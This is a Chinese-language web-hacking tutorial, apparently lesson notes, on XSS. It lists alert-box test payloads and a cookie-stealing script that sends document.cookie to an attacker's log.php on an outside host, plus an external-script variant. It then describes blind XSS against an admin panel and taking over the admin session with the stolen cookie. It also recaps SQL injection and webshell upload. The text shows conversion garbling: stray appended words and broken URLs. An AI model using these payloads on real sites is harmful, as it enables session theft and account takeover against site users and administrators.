上一节课,咱们经过SQL注入获取目标数据库中的数据,再经过获取账户密码,进行爆破、后台路径成功地登陆进入后台,再经过后台的文件上传漏洞,成功地获取网站的webshell,也就是获取了目标网站的权限。php
今天咱们讲XSSweb
XSS利用方式 攻击客户端 窃取用户信息 管理员shell
普通用户数据库
SQL注入利用数据 提权 写文件提权cookie
XSS经常使用的几个payloaddom
<img/src=x>xss
<svg/onload=alert(1)>svg
<script>alert(1)<script>测试
第一种加载图片,后两种弹窗网站
<!-- 注释的方式,容易形成页面混乱
好比像测试的一个网站,有个用户注册,咱们经过修改信息达到弹窗的目的。而管理员只有在后台点开会员信息时,才会弹窗
这就是XSS盲打,因此说失败率仍是挺高的,可是事情咱们仍是要去作
当我把咱们的cookie改为管理员的cookie时,就至关于咱们有管理员的权限了。
可使用Editthiscookie
payload:new image().src ="http://domain.com/log.php?c=" + encodeURL(document.cookie);
JS的一个语法
document.cookie的内容以下
此时咱们加上标签 <script>new image().src ="http:/txt.me/log.php?c=" + encodeURL(document.cookie);</script>
http:/txt.me/log.php?c=
咱们这个域名下有个log.php的目录,后面有个参数c,假如咱们随便输入一段内容,c=23333
那么这段内容会被存储到cookie.txt中
当咱们插入xss的payload时,发现有字符串限制时怎么办呢
利用src 外部的Js脚本属性 <script src=//txt.me/1.js></script>
1.js就是咱们上面字符串的内容
插入后,咱们能够查看一下有没有成功
咱们刚才进入了两次,成功记录了2次
咱们能够对比一下是否是咱们的cookie 查看Headers
当管理员在后台点击会员管理时,就会触发
而后咱们得到管理员cookie后,开始替换
成功替换,刷新一下页面,此时咱们就是管理员页面了
end
XSS平台的使用
未完待续